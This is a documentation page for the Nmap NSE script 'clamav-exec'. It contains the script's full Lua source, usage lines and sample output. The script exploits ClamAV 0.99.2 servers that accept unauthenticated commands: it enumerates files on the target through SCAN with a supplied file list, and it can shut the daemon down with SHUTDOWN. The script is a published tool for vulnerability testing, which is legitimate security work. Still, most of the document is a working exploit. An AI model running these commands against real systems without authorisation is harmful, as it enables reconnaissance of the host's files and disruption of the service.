<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File clamav-exec</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth,auth<br/>
<b>Author:</b> Paulino Calderon <calderon()websec.mx><br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://nmap.org/nsedoc/scripts/clamav-exec.html">https://nmap.org/nsedoc/scripts/clamav-exec.html</a><br/>
<h3>Summary</h3>
<p>Exploits ClamAV servers vulnerable to unauthenticated clamav comand execution.</p>
<p>ClamAV server 0.99.2, and possibly other previous versions, allow the execution of dangerous service commands without authentication. Specifically, the command 'SCAN' may be used to list system files and the command 'SHUTDOWN' shut downs the service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).</p>
<p>This script without arguments test the availability of the command 'SCAN'.</p>
<p>Reference:></p>
<ul>
<li><a href="http://twitter.com/nitr0usmx/status/740673507684679680" target=_blank>http://twitter.com/nitr0usmx/status/740673507684679680</a></li>
<li><a href="https://bugzilla.clamav.net/show_bug.cgi?id=11585" target=_blank>https://bugzilla.clamav.net/show_bug.cgi?id=11585</a></li>
</ul>
<h3>Arguments</h3>
<table>
<tr><td>clamav-exec.scandb:</td><td></td></tr>
<tr><td>clamav-exec.cmd:</td><td></td></tr>
<tr><td>vulns.short:</td><td>See the documentation for the <a href="nmap/libraries/vulns.htm">vulns</a> library</td></tr>
<tr><td>vulns.showall:</td><td>See the documentation for the <a href="nmap/libraries/vulns.htm">vulns</a> library</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap -sV --script clamav-exec &lt;target&gt;
nmap --script clamav-exec --script-args cmd=&#39;scan&#39;,scandb=&#39;files.txt&#39; &lt;target&gt;
nmap --script clamav-exec --script-args cmd=&#39;shutdown&#39; &lt;target&gt;</pre>
<h3>Output</h3>
<pre>PORT     STATE SERVICE VERSION
3310/tcp open  clam    ClamAV 0.99.2 (21714)
| clamav-exec:
|   VULNERABLE:
|   ClamAV Remote Command Execution
|     State: VULNERABLE
|       ClamAV 0.99.2, and possibly other previous versions, allow the execution of the
|       clamav commands SCAN and SHUTDOWN without authentication. The command &#39;SCAN&#39;
|       may be used to enumerate system files and the command &#39;SHUTDOWN&#39; shut downs the
|       service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).
|
|     Disclosure date: 2016-06-8
|     Extra information:
|       SCAN command is enabled.
|     References:
|       https://bugzilla.clamav.net/show_bug.cgi?id=11585
|_      https://twitter.com/nitr0usmx/status/740673507684679680</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/vulns.htm">vulns</a></li>
<li><a href="nmap/libraries/nmap.htm">nmap</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/table.htm">table</a></li>
<li><a href="nmap/libraries/io.htm">io</a></li>
<li><a href="nmap/libraries/string.htm">string</a></li>
<li><a href="nmap/libraries/comm.htm">comm</a></li>
</ul>
<h3>Code</h3>
<pre>local shortport = require &quot;shortport&quot;
local vulns = require &quot;vulns&quot;
local nmap = require &quot;nmap&quot;
local stdnse = require &quot;stdnse&quot;
local table = require &quot;table&quot;
local io = require &quot;io&quot;
local string = require &quot;string&quot;
local comm = require &quot;comm&quot;

description = [[
Exploits ClamAV servers vulnerable to unauthenticated clamav comand execution.

ClamAV server 0.99.2, and possibly other previous versions, allow the execution
of dangerous service commands without authentication. Specifically, the command &#39;SCAN&#39;
may be used to list system files and the command &#39;SHUTDOWN&#39; shut downs the
service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).

This script without arguments test the availability of the command &#39;SCAN&#39;.

Reference:
* https://twitter.com/nitr0usmx/status/740673507684679680
* https://bugzilla.clamav.net/show_bug.cgi?id=11585
]]

---
-- @usage
-- nmap -sV --script clamav-exec &lt;target&gt;
-- nmap --script clamav-exec --script-args cmd=&#39;scan&#39;,scandb=&#39;files.txt&#39; &lt;target&gt;
-- nmap --script clamav-exec --script-args cmd=&#39;shutdown&#39; &lt;target&gt;
--
-- @output
-- PORT     STATE SERVICE VERSION
-- 3310/tcp open  clam    ClamAV 0.99.2 (21714)
-- | clamav-exec:
-- |   VULNERABLE:
-- |   ClamAV Remote Command Execution
-- |     State: VULNERABLE
-- |       ClamAV 0.99.2, and possibly other previous versions, allow the execution of the
-- |       clamav commands SCAN and SHUTDOWN without authentication. The command &#39;SCAN&#39;
-- |       may be used to enumerate system files and the command &#39;SHUTDOWN&#39; shut downs the
-- |       service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).
-- |
-- |     Disclosure date: 2016-06-8
-- |     Extra information:
-- |       SCAN command is enabled.
-- |     References:
-- |       https://bugzilla.clamav.net/show_bug.cgi?id=11585
-- |_      https://twitter.com/nitr0usmx/status/740673507684679680
-- @xmloutput
-- &lt;table key=&quot;NMAP-1&quot;&gt;
-- &lt;elem key=&quot;title&quot;&gt;ClamAV Remote Command Execution&lt;/elem&gt;
-- &lt;elem key=&quot;state&quot;&gt;VULNERABLE&lt;/elem&gt;
-- &lt;table key=&quot;description&quot;&gt;
-- &lt;elem&gt;ClamAV 0.99.2, and possibly other previous versions, allow the execution
-- of the &amp;#xa;clamav commands SCAN and SHUTDOWN without authentication.
-- The command &amp;apos;SCAN&amp;apos; &amp;#xa;may be used to enumerate system files and
-- the command &amp;apos;SHUTDOWN&amp;apos; shut downs the &amp;#xa;service.
-- This vulnerability was discovered by Alejandro Hernandez (nitr0us).&amp;#xa;&lt;/elem&gt;
-- &lt;/table&gt;
-- &lt;table key=&quot;dates&quot;&gt;
-- &lt;table key=&quot;disclosure&quot;&gt;
-- &lt;elem key=&quot;year&quot;&gt;2016&lt;/elem&gt;
-- &lt;elem key=&quot;day&quot;&gt;8&lt;/elem&gt;
-- &lt;elem key=&quot;month&quot;&gt;06&lt;/elem&gt;
-- &lt;/table&gt;
-- &lt;/table&gt;
-- &lt;elem key=&quot;disclosure&quot;&gt;2016-06-8&lt;/elem&gt;
-- &lt;table key=&quot;extra_info&quot;&gt;
-- &lt;elem&gt;SCAN command is enabled.&lt;/elem&gt;
-- &lt;/table&gt;
-- &lt;table key=&quot;refs&quot;&gt;
-- &lt;elem&gt;https://bugzilla.clamav.net/show_bug.cgi?id=11585&lt;/elem&gt;
-- &lt;elem&gt;https://twitter.com/nitr0usmx/status/740673507684679680&lt;/elem&gt;
-- &lt;/table&gt;
-- &lt;/table&gt;
--
-- @args clamav-exec.cmd Command to execute. Option: scan and shutdown
-- @args clamav-exec.scandb Database to file list.
---

author = &quot;Paulino Calderon &lt;calderon()websec.mx&gt;&quot;
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = {&quot;exploit&quot;, &quot;vuln&quot;}

portrule = shortport.port_or_service(3310, &quot;clam&quot;)

local function shutdown(host, port)
  local status, data = comm.exchange(host, port, &quot;SHUTDOWN&quot;)
  if not status and data == &quot;EOF&quot; then
    stdnse.debug1(&quot;Expected EOF response to SHUTDOWN command:%s&quot;, data)
    return true
  end
  return nil
end

---
-- scan(host, port, file)
-- Sends SCAN %FILE command to clamav.
-- If no file is specified, we query a non existing file to check the response.
--
local function scan(host, port, file)
  local status, data

  if not file then
    status, data = comm.exchange(host, port, &quot;SCAN /trinity/loves/nmap&quot;)
    if not status then
      stdnse.debug1(&quot;Failed to send SCAN command:%s&quot;, data)
      return nil
    end

    if data and data:match(&quot;No such file&quot;) then
      stdnse.debug1(&quot;SCAN command enabled.&quot;)
      return true, nil
    end
  else
    status, data = comm.exchange(host, port, &quot;SCAN &quot; .. file)
    if not status then
      stdnse.debug1(&quot;Failed to send &#39;SCAN %s&#39; command:%s&quot;, file, data)
      return nil
    end
    if data and data:match(&quot;OK&quot;) then
        stdnse.debug1(&quot;File &#39;%s&#39; exists&quot;, file)
        return true, true
      else
        stdnse.debug1(&quot;File &#39;%s&#39; does not exists&quot;, file)
        return true, nil
      end
  end

  return nil
end

local function check_clam(host, port)
  local status, data = comm.exchange(host, port, &quot;PING&quot;)
  if not status then
    stdnse.debug1(&quot;Failed to send PING command:%s&quot;, data)
    return nil
  end
  if data and data:match(&quot;PONG&quot;) then
    stdnse.debug1(&quot;PONG response received&quot;)
    return true
  end
  return nil
end

action = function(host, port)
  local cmd = stdnse.get_script_args(SCRIPT_NAME..&quot;.cmd&quot;) or nil
  local scandb = stdnse.get_script_args(SCRIPT_NAME..&quot;.scandb&quot;) or nil

  if cmd == &quot;scan&quot; and not scandb then
    return &quot;The argument &#39;scandb&#39; must be set if we are using the command &#39;SCAN&#39;&quot;
  end

  --Check the service and update the port table
  local clamchk = check_clam(host, port)
  if clamchk then
    stdnse.debug1(&quot;ClamAV daemon found&quot;)
    port.version.name = &quot;clam&quot;
    port.version.product = &quot;ClamAV&quot;
    nmap.set_port_version(host, port)
  end

  local vuln = {
    title = &#39;ClamAV Remote Command Execution&#39;,
    state = vulns.STATE.NOT_VULN,
    description = [[
ClamAV 0.99.2, and possibly other previous versions, allow the execution of the
clamav commands SCAN and SHUTDOWN without authentication. The command &#39;SCAN&#39;
may be used to enumerate system files and the command &#39;SHUTDOWN&#39; shut downs the
service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).
]],
    references = {
      &#39;https://bugzilla.clamav.net/show_bug.cgi?id=11585&#39;,
      &#39;https://twitter.com/nitr0usmx/status/740673507684679680&#39;
    },
    dates = {
      disclosure = {year = &#39;2016&#39;, month = &#39;06&#39;, day = &#39;8&#39;},
    },
  }
  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
  local status, files = nil

  if cmd == &quot;scan&quot; then
    local file = io.open(scandb, &quot;r&quot;)
    if not file then
      stdnse.debug1(&quot;Couldn&#39;t open file &#39;%s&#39;&quot;, scandb)
      return nil
    end
    local files = {}
    local exists
    while true do
      local db_line = file:read()
      if not db_line then
        break
      end
      status, exists = scan(host, port, db_line)
      if status and exists then
        table.insert(files, string.format(&quot;%s - FOUND!&quot;, db_line))
      end
    end
    if #files &gt; 0 then
      vuln.extra_info = stdnse.format_output(true, files)
      vuln.state = vulns.STATE.VULN
    end
  elseif cmd == &quot;shutdown&quot; then
    status = shutdown(host, port)
    if status then
      vuln.extra_info = &quot;SHUTDOWN command sent successfully.&quot;
      vuln.state = vulns.STATE.VULN
    end
  else
    status, files = scan(host, port, nil)
    if status then
      vuln.extra_info = &quot;SCAN command is enabled.&quot;
      vuln.state = vulns.STATE.VULN
    end
  end

  return vuln_report:make_output(vuln)
end</pre>
